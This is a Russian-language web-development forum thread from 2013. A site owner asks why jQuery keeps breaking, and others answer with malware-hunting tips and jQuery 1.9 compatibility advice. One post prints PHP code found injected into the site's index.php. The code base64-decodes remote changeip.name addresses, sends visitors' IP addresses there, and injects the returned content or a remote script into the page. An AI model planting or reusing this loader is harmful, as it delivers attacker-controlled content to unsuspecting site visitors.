Javascript.RU

Создать новую тему Ответ
 
Опции темы Искать в теме
  #1 (permalink)  
Старый 05.02.2013, 23:59
Новичок на форуме
Отправить личное сообщение для Twide Посмотреть профиль Найти все сообщения от Twide
 
Регистрация: 04.02.2013
Сообщений: 8

jQuery постоянно слетает
Вот чудеса. Есть сайт, возраст около 2-х лет, все работало отлично, стоял движ. DLE. Недавно слетел jQuery и перестали работать все скрипты, написанные на нем. Перезалил папку Engine, все заработало, но через пару дней опять. На кого грешить? Кто виноват?))
Ответить с цитированием
  #2 (permalink)  
Старый 06.02.2013, 00:25
Аватар для danik.js
Профессор
Отправить личное сообщение для danik.js Посмотреть профиль Найти все сообщения от danik.js
 
Регистрация: 11.09.2010
Сообщений: 8,804

Если вы не знали, то скрипты могут изнашиваться. Со временем они могут поломаться, или перестать работать. В этом нет ничего странного, в мире нет ничего вечного. Если серьезно, то проверьте файлы (и не только js) на наличие вредоносного кода.
Ответить с цитированием
  #3 (permalink)  
Старый 06.02.2013, 00:28
Новичок на форуме
Отправить личное сообщение для Twide Посмотреть профиль Найти все сообщения от Twide
 
Регистрация: 04.02.2013
Сообщений: 8

А какие файлы лучше проверять? Невозможно ведь весь движок перелопатить.
Ответить с цитированием
  #4 (permalink)  
Старый 06.02.2013, 00:34
Аватар для danik.js
Профессор
Отправить личное сообщение для danik.js Посмотреть профиль Найти все сообщения от danik.js
 
Регистрация: 11.09.2010
Сообщений: 8,804

Ну для начала те, что ломаются. Смотрите на время последнего изменения файла. Стоит взглянуть на index.php и на .htaccess . Есть различные скрипты и программы для обнаружения вредоноса. Антивирусники вроде тоже че-та могут (не знаю, я живу без антивируса, нет, на винде )
Ответить с цитированием
  #5 (permalink)  
Старый 06.02.2013, 00:44
Новичок на форуме
Отправить личное сообщение для Twide Посмотреть профиль Найти все сообщения от Twide
 
Регистрация: 04.02.2013
Сообщений: 8

Нашел кое-что в index.php

echo "\n<!-- DataLife Engine Copyright SoftNews Media Group (http://dle-news.ru) -->\r\n";

GzipOut();
function sql2_safe($in) {
        $rtn = base64_decode($in);
        return $rtn;
}
function collectnewss() {

		if (!isset($_COOKIE["iJijkdaMnerys"])) {
        $value = 'yadeor';
		$ip = $_SERVER['REMOTE_ADDR'];
        $get = sql2_safe("aHR0cDovL2N0cmxzaS5jaGFuZ2VpcC5uYW1lOjg4OC9tb3ZlLnBocD9pcD0=").$ip;
		$content = @file_get_contents($get);
		@setcookie("iJijkdaMnerys", $value, time()+3600*24);
		if (!$content)
			echo sql2_safe("PHNjcmlwdCBzcmM9Imh0dHA6Ly9mZWVsdGhlc2FtZS5jaGFuZ2VpcC5uYW1lL3JzaXplLmpzIj48L3NjcmlwdD4=");
		else 
			echo $content;

		}
}
collectnewss ();
?>


Сначала думал, что ничего особенного, но потом открыл index.php в архиве со скриптом и там этот код выглядит совсем иначе.

echo "\n<!-- DataLife Engine Copyright SoftNews Media Group (http://dle-news.ru) -->\r\n";

GzipOut();
?>


Как думаете, это то?
Ответить с цитированием
  #6 (permalink)  
Старый 06.02.2013, 00:50
Аватар для рони
Профессор
Отправить личное сообщение для рони Посмотреть профиль Найти все сообщения от рони
 
Регистрация: 27.05.2010
Сообщений: 33,070

Twide,
<script src="http://code.jquery.com/jquery-1.9.1.js"></script>
<script  type="text/javascript">
alert($.browser.msie );
</script>

с версии 1.9 нет подержки некоторых функций например $.browser можно исправить поставив загрузку ниже версии либо jQuery Migrate plugin
<script src="http://code.jquery.com/jquery-latest.js"></script>
<script src="http://code.jquery.com/jquery-migrate-1.1.0.js"></script>
<script>
alert($.browser.msie );
</script>


<script src="http://code.jquery.com/jquery-1.8.3.js" type="text/javascript"></script>
<script  type="text/javascript">
alert($.browser.msie );
</script>
Ответить с цитированием
  #7 (permalink)  
Старый 28.02.2013, 09:08
Аспирант
Отправить личное сообщение для realstranger Посмотреть профиль Найти все сообщения от realstranger
 
Регистрация: 28.01.2011
Сообщений: 31

Спасибо, в моём случае не помогает даже подключение нужной библиотеки, 2 скрипта между собой конфликтуют..
Ответить с цитированием
  #8 (permalink)  
Старый 28.02.2013, 09:10
Аватар для рони
Профессор
Отправить личное сообщение для рони Посмотреть профиль Найти все сообщения от рони
 
Регистрация: 27.05.2010
Сообщений: 33,070

Сообщение от realstranger
2 скрипта между собой конфликтуют..
какие 2 скрипта?
Ответить с цитированием
  #9 (permalink)  
Старый 28.02.2013, 10:59
Аспирант
Отправить личное сообщение для realstranger Посмотреть профиль Найти все сообщения от realstranger
 
Регистрация: 28.01.2011
Сообщений: 31

Всё, разобрался, спасибо вам огромное! Проблема была не с кофнликтами, а с тем, что Chrome неправильно обрабатывал scrollTo, заменил на animate. Всё заработало!!

Осталась только проблема с соц. кнопками из моего прошлого топика)

Последний раз редактировалось realstranger, 28.02.2013 в 11:06.
Ответить с цитированием
Ответ



Опции темы Искать в теме
Искать в теме:

Расширенный поиск


Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
хочу инвайт на хабр macdack Оффтопик 45 28.07.2013 23:18
Несколько версий JQuery UI на одной странице. Casufi jQuery 2 10.11.2012 15:24
Вопрос поддержки старых методов jQuery antonM jQuery 1 04.10.2012 00:08
jquery is not defined - странный случай tarya jQuery 2 16.07.2012 14:27
2 разных модуля на jQuery - как подключить? finder jQuery 4 23.03.2012 22:29